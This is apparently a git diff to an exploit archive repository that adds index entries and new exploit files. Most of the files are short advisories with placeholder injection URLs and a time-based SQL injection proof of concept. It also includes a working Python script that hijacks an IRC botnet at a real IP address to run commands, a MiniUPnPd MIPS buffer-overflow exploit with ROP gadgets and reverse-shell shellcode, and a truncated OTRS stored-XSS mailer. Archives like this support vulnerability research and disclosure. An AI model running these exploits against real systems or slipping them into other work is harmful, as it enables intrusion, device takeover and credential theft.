diff --git a/files.csv b/files.csv
index d09a71858..848326040 100755
--- a/files.csv
+++ b/files.csv
@@ -13090,6 +13090,7 @@ id,file,description,date,author,platform,type,port
15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - SEH Exploit",2010-09-15,"sanjeev gupta",windows,local,0
15014,platforms/php/webapps/15014.txt,"pixelpost 1.7.3 - Multiple Vulnerabilities",2010-09-15,Sweet,php,webapps,0
15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - (Win7 ROP-Code Metasploit Module)",2010-09-15,Node,windows,remote,0
+36828,platforms/java/webapps/36828.txt,"JaWiki 'versionNo' Parameter Cross Site Scripting Vulnerability",2012-02-17,sonyy,java,webapps,0
15017,platforms/windows/dos/15017.py,"Chalk Creek Media Player 1.0.7 - (.mp3 / .wma) Denial of Service Vulnerability",2010-09-16,"Carlos Mario Penagos Hollmann",windows,dos,0
15018,platforms/asp/webapps/15018.txt,"mojoportal - Multiple Vulnerabilities",2010-09-16,Abysssec,asp,webapps,0
15019,platforms/windows/dos/15019.txt,"Microsoft Excel - HFPicture Record Parsing Remote Code Execution Vulnerability",2010-09-16,Abysssec,windows,dos,0
@@ -15958,7 +15959,7 @@ id,file,description,date,author,platform,type,port
18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0
18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0
18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0
-18417,platforms/php/webapps/18417.txt,"wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0
+18417,platforms/php/webapps/18417.txt,"Wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0
18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0
18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0
@@ -33206,7 +33207,7 @@ id,file,description,date,author,platform,type,port
36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
-36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
+36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
@@ -33222,5 +33223,20 @@ id,file,description,date,author,platform,type,port
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
36821,platforms/php/webapps/36821.txt,"WebUI 1.5b6 - Remote Code Execution Vulnerability",2015-04-23,"TUNISIAN CYBER",php,webapps,0
36822,platforms/windows/local/36822.pl,"Quick Search 1.1.0.189 - 'search textbox' Unicode SEH egghunter Buffer Overflow",2015-04-23,"Tomislav Paskalev",windows,local,0
+36823,platforms/php/webapps/36823.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi",2015-04-23,"Felipe Molina",php,webapps,0
+36824,platforms/php/webapps/36824.txt,"Ultimate Product Catalogue Wordpress Plugin - Unauthenticated SQLi #2",2015-04-23,"Felipe Molina",php,webapps,0
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
+36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (W7 - DEP Bypass)",2015-04-24,naxxo,windows,local,0
+36829,platforms/windows/remote/36829.txt,"R2/Extreme 1.65 - Stack Based Buffer Overflow and Directory Traversal Vulnerabilities",2012-02-17,"Luigi Auriemma",windows,remote,0
+36830,platforms/php/webapps/36830.txt,"Impulsio CMS 'id' Parameter SQL Injection Vulnerability",2012-02-16,sonyy,php,webapps,0
+36831,platforms/hardware/remote/36831.txt,"Endian Firewall 2.4 openvpn_users.cgi PATH_INFO XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36832,platforms/hardware/remote/36832.txt,"Endian Firewall 2.4 dnat.cgi createrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36833,platforms/hardware/remote/36833.txt,"Endian Firewall 2.4 dansguardian.cgi addrule Parameter XSS",2012-02-27,"Vulnerability Research Laboratory",hardware,remote,0
+36834,platforms/php/webapps/36834.txt,"Joomla! X-Shop Component 'idd' Parameter SQL Injection Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
+36835,platforms/php/webapps/36835.txt,"Joomla Xcomp 'com_xcomp' Component Local File Include Vulnerability",2012-02-18,KedAns-Dz,php,webapps,0
+36836,platforms/multiple/remote/36836.py,"Legend Perl IRC Bot - Remote Code Execution PoC",2015-04-27,"Jay Turla",multiple,remote,0
+36844,platforms/php/webapps/36844.txt,"WordPress <= 4.2 - Stored XSS",2015-04-27,klikki,php,webapps,0
+36839,platforms/multiple/remote/36839.py,"MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS)",2015-04-27,"Onur Alanbel (BGA)",multiple,remote,0
+36841,platforms/windows/local/36841.py,"UniPDF Version 1.2 - 'xml' Buffer Overflow Crash PoC",2015-04-27,"Avinash Thapa",windows,local,0
+36842,platforms/php/webapps/36842.pl,"OTRS < 3.1.x & < 3.2.x & < 3.3.x - Stored Cross-Site Scripting (XSS)",2015-04-27,"Adam Ziaja",php,webapps,0
diff --git a/platforms/hardware/remote/36831.txt b/platforms/hardware/remote/36831.txt
new file mode 100755
index 000000000..393782b6f
--- /dev/null
+++ b/platforms/hardware/remote/36831.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+
+https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS]
\ No newline at end of file
diff --git a/platforms/hardware/remote/36832.txt b/platforms/hardware/remote/36832.txt
new file mode 100755
index 000000000..f3ae299f3
--- /dev/null
+++ b/platforms/hardware/remote/36832.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+
+https://www.example.com/cgi-bin/dnat.cgi#createrule[XSS]
\ No newline at end of file
diff --git a/platforms/hardware/remote/36833.txt b/platforms/hardware/remote/36833.txt
new file mode 100755
index 000000000..37248277b
--- /dev/null
+++ b/platforms/hardware/remote/36833.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52076/info
+
+Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.
+
+https://www.example.com/cgi-bin/dansguardian.cgi#addrule[XSS]
\ No newline at end of file
diff --git a/platforms/java/webapps/36828.txt b/platforms/java/webapps/36828.txt
new file mode 100755
index 000000000..60a1540a3
--- /dev/null
+++ b/platforms/java/webapps/36828.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52060/info
+
+JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/multiple/remote/36836.py b/platforms/multiple/remote/36836.py
new file mode 100755
index 000000000..9fd19981a
--- /dev/null
+++ b/platforms/multiple/remote/36836.py
@@ -0,0 +1,50 @@
+#
+# legend_rce.py
+# Legend Perl IRC Bot Remote Code Execution PoC
+# author: Jay Turla ( @shipcod3 )
+# description: This is a RCE PoC for Legend Bot which has been used in the Shellshock spam October 2014.
+# reference: http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html
+# greetz to ROOTCON (rootcon.org) goons
+#
+
+import socket
+import sys
+
+def usage():
+ print("USAGE: python legend_rce.py nick")
+ print("Sample nicks found in the wild: god, ARZ, Zax, HackTech, TheChozen")
+
+def main(argv):
+
+ if len(argv) < 2:
+ return usage()
+
+ #irc server connection settings
+ botnick = sys.argv[1] #admin payload for taking over the Legend Bot
+ server = "80.246.50.71" #irc server
+ channel = "#Apache" #channel where the bot is located
+
+ irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket
+ print "connecting to:"+server
+ irc.connect((server, 2015)) #connects to the server, you can change the port by changing 2015 for example :)
+ irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :legend.rocks\n") #user authentication
+ irc.send("NICK "+ botnick +"\n") #sets nick
+ irc.send("JOIN "+ channel +"\n") #join the chan
+ irc.send("PRIVMSG "+channel+" :!legend @system 'uname -a' \n") #send the payload to the bot
+
+ while 1: #puts it in a loop
+ text=irc.recv(2040) #receive the text
+ print text #print text to console
+
+ if text.find('PING') != -1: #check if 'PING' is found
+ irc.send('PONG ' + text.split() [1] + '\r\n') #returns 'PONG' back to the server (prevents pinging out!)
+ if text.find('!quit') != -1: #quit the Bot
+ irc.send ("QUIT\r\n")
+ sys.exit()
+ if text.find('Linux') != -1:
+ irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")
+ irc.send ("QUIT\r\n")
+ sys.exit()
+
+if __name__ == "__main__":
+ main(sys.argv)
diff --git a/platforms/multiple/remote/36839.py b/platforms/multiple/remote/36839.py
new file mode 100755
index 000000000..86b368da9
--- /dev/null
+++ b/platforms/multiple/remote/36839.py
@@ -0,0 +1,142 @@
+#!/usr/bin/env python
+
+# Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series
+# Date: 26.04.2015
+# Exploit Author: Onur ALANBEL (BGA)
+# Vendor Homepage: http://miniupnp.free.fr/
+# Version: 1.0
+# Architecture: MIPS
+# Tested on: AirTies RT-204v3
+# CVE : 2013-0230
+# Exploit gives a reverse shell to lhost:lport
+# Details: https://www.exploit-db.com/docs/36806.pdf
+
+import urllib2
+from string import join
+from argparse import ArgumentParser
+from struct import pack
+from socket import inet_aton
+
+BYTES = 4
+
+
+def hex2str(value, size=BYTES):
+ data = ""
+
+ for i in range(0, size):
+ data += chr((value >> (8*i)) & 0xFF)
+
+ data = data[::-1]
+
+ return data
+
+
+arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
+ CVE-2013-0230 Reverse Shell exploit for AirTies \
+ RT Series, start netcat on lhost:lport")
+arg_parser.add_argument("--target", required=True, help="Target IP address")
+arg_parser.add_argument("--lhost", required=True, help="The IP address\
+ which nc is listening")
+arg_parser.add_argument("--lport", required=True, type=int, help="The\
+ port which nc is listening")
+
+args = arg_parser.parse_args()
+
+libc_base = 0x2aabd000
+ra_1 = hex2str(libc_base + 0x36860) # ra = 1. gadget
+s1 = hex2str(libc_base + 0x1636C) # s1 = 2. gadget
+sleep = hex2str(libc_base + 0x35620) # sleep function
+ra_2 = hex2str(libc_base + 0x28D3C) # ra = 3. gadget
+s6 = hex2str(libc_base + 0x1B19C) # ra = 4.gadget
+s2 = s6
+lport = pack('>H', args.lport)
+lhost = inet_aton(args.lhost)
+
+shellcode = join([
+ "\x24\x11\xff\xff"
+ "\x24\x04\x27\x0f"
+ "\x24\x02\x10\x46"
+ "\x01\x01\x01\x0c"
+ "\x1e\x20\xff\xfc"
+ "\x24\x11\x10\x2d"
+ "\x24\x02\x0f\xa2"
+ "\x01\x01\x01\x0c"
+ "\x1c\x40\xff\xf8"
+ "\x24\x0f\xff\xfa"
+ "\x01\xe0\x78\x27"
+ "\x21\xe4\xff\xfd"
+ "\x21\xe5\xff\xfd"
+ "\x28\x06\xff\xff"
+ "\x24\x02\x10\x57"
+ "\x01\x01\x01\x0c"
+ "\xaf\xa2\xff\xff"
+ "\x8f\xa4\xff\xff"
+ "\x34\x0f\xff\xfd"
+ "\x01\xe0\x78\x27"
+ "\xaf\xaf\xff\xe0"
+ "\x3c\x0e" + lport +
+ "\x35\xce" + lport +
+ "\xaf\xae\xff\xe4"
+ "\x3c\x0e" + lhost[:2] +
+ "\x35\xce" + lhost[2:4] +
+ "\xaf\xae\xff\xe6"
+ "\x27\xa5\xff\xe2"
+ "\x24\x0c\xff\xef"
+ "\x01\x80\x30\x27"
+ "\x24\x02\x10\x4a"
+ "\x01\x01\x01\x0c"
+ "\x24\x0f\xff\xfd"
+ "\x01\xe0\x78\x27"
+ "\x8f\xa4\xff\xff"
+ "\x01\xe0\x28\x21"
+ "\x24\x02\x0f\xdf"
+ "\x01\x01\x01\x0c"
+ "\x24\x10\xff\xff"
+ "\x21\xef\xff\xff"
+ "\x15\xf0\xff\xfa"
+ "\x28\x06\xff\xff"
+ "\x3c\x0f\x2f\x2f"
+ "\x35\xef\x62\x69"
+ "\xaf\xaf\xff\xec"
+ "\x3c\x0e\x6e\x2f"
+ "\x35\xce\x73\x68"
+ "\xaf\xae\xff\xf0"
+ "\xaf\xa0\xff\xf4"
+ "\x27\xa4\xff\xec"
+ "\xaf\xa4\xff\xf8"
+ "\xaf\xa0\xff\xfc"
+ "\x27\xa5\xff\xf8"
+ "\x24\x02\x0f\xab"
+ "\x01\x01\x01\x0c"
+ ], '')
+
+payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
+ + ra_2 + 'C'*32 + shellcode
+
+
+soap_headers = {
+ 'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
+}
+
+soap_data = """
+
+
+
+
+
+
+
+ """
+
+try:
+ print "Exploiting..."
+ req = urllib2.Request("http://" + args.target + ":5555", soap_data,
+ soap_headers)
+ res = urllib2.urlopen(req).read()
+except:
+ print "Ok"
diff --git a/platforms/php/webapps/36823.txt b/platforms/php/webapps/36823.txt
new file mode 100755
index 000000000..fd7be177f
--- /dev/null
+++ b/platforms/php/webapps/36823.txt
@@ -0,0 +1,51 @@
+# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate
+Product Catalogue wordpress plugin
+# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
+intext:"Category",
+inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
+# Date: 22/04/2015
+# Exploit Author: Felipe Molina de la Torre (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
+# Software Link:
+https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
+# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
+# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache
+2.4.0 (Ubuntu)
+# CVE : Requested to mitre but not assigned yet
+# Category: webapps
+
+1. Summary:
+
+ Ultimate Product Catalogue is a responsive and easily customizable
+plugin for all your product catalogue needs. It has +59.000 downloads,
++3.000 active installations.
+
+ Unauthenticated SQL injection in ajax call when the plugin is counting
+the times a product is being seen by the web visitors. The vulnerable POST
+parameter is "Item_ID".
+
+2. Vulnerability timeline:
+- 22/04/2015: Identified in version 3.1.2
+- 22/04/2015: Comunicated to developer company etoilewebdesign.com
+- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
+3. Vulnerable code:
+
+ In file Functions/Process_Ajax.php line 67:
+ [...]
+$Item_ID = $_POST['Item_ID'];
+ $Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name
+WHERE Item_ID=" . $Item_ID);
+[...]
+
+3. Proof of concept:
+
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host:
+ [...]
+ Cookie: wordpress_f305[...]
+
+ Item_ID=2 AND SLEEP(5)&action=record_view
+
+4. Solution:
+
+ Update to version 3.1.3
\ No newline at end of file
diff --git a/platforms/php/webapps/36824.txt b/platforms/php/webapps/36824.txt
new file mode 100755
index 000000000..6aaba8cce
--- /dev/null
+++ b/platforms/php/webapps/36824.txt
@@ -0,0 +1,41 @@
+# Exploit Title: Unauthenticated SQLi on Ultimate Product Catalogue
+wordpress plugin
+# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue"
+intext:"Category",
+inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
+# Date: 22/04/2015
+# Exploit Author: Felipe Molina de la Torre (@felmoltor)
+# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
+# Software Link:
+https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
+# Version: < 3.1.2, Comunicated and Fixed by the Vendor in 3.1.3
+# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turnedd off, Apache
+2.4.0 (Ubuntu)
+# CVE : Requested to mitre but not assigned yet
+# Category: webapps
+
+1. Summary:
+
+ Ultimate Product Catalogue is A responsive and easily customizable
+plugin for all your product catalogue needs. It has +59.000 downloads,
++3.000 active installations.
+
+ Unauthenticated SQL injection in parameter "SingleProduct" when a web
+visitor explores a product published by the web administrator
+
+2. Vulnerability timeline:
+- 22/04/2015: Identified in version 3.1.2
+- 22/04/2015: Comunicated to developer company etoilewebdesign.com
+- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3
+3. Vulnerable code:
+
+ File Functions/Shortcodes.php line 779
+
+3. Proof of concept
+
+ http:///?SingleProduct=2'+and+'a'='a
+ http:///?SingleProduct=2'+and+'a'='b
+
+4. Solution:
+
+ Update to version 3.1.3
diff --git a/platforms/php/webapps/36830.txt b/platforms/php/webapps/36830.txt
new file mode 100755
index 000000000..a31018896
--- /dev/null
+++ b/platforms/php/webapps/36830.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52063/info
+
+Impulsio CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?id=[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/36834.txt b/platforms/php/webapps/36834.txt
new file mode 100755
index 000000000..7cf662dcd
--- /dev/null
+++ b/platforms/php/webapps/36834.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52077/info
+
+The X-Shop component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_x-shop&action=artdetail&idd='
\ No newline at end of file
diff --git a/platforms/php/webapps/36835.txt b/platforms/php/webapps/36835.txt
new file mode 100755
index 000000000..eed6d2541
--- /dev/null
+++ b/platforms/php/webapps/36835.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/52078/info
+
+The Xcomp component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+http://www.example.com/index.php?option=com_xcomp&controller=../../[LFI]%00
\ No newline at end of file
diff --git a/platforms/php/webapps/36842.pl b/platforms/php/webapps/36842.pl
new file mode 100755
index 000000000..9a916527a
--- /dev/null
+++ b/platforms/php/webapps/36842.pl
@@ -0,0 +1,20 @@
+# Exploit Title: Stored Cross-Site Scripting (XSS) in OTRS
+# Date: 28.01.2014
+# Exploit Author: Adam Ziaja http://adamziaja.com
+# Vendor Homepage: https://www.otrs.com
+# Version: 3.1.x before 3.1.20, 3.2.x before 3.2.15, and 3.3.x before 3.3.5
+# CVE : CVE-2014-1695
+
+#!/usr/bin/perl -w
+use strict;
+use MIME::Lite;
+my $msg = MIME::Lite->new(
+ Subject => 'OTRS XSS PoC',
+ From => 'attacker@example.com',
+ To => 'otrs@example.com',
+ Type => 'text/html',
+ Data =>
+ '![]()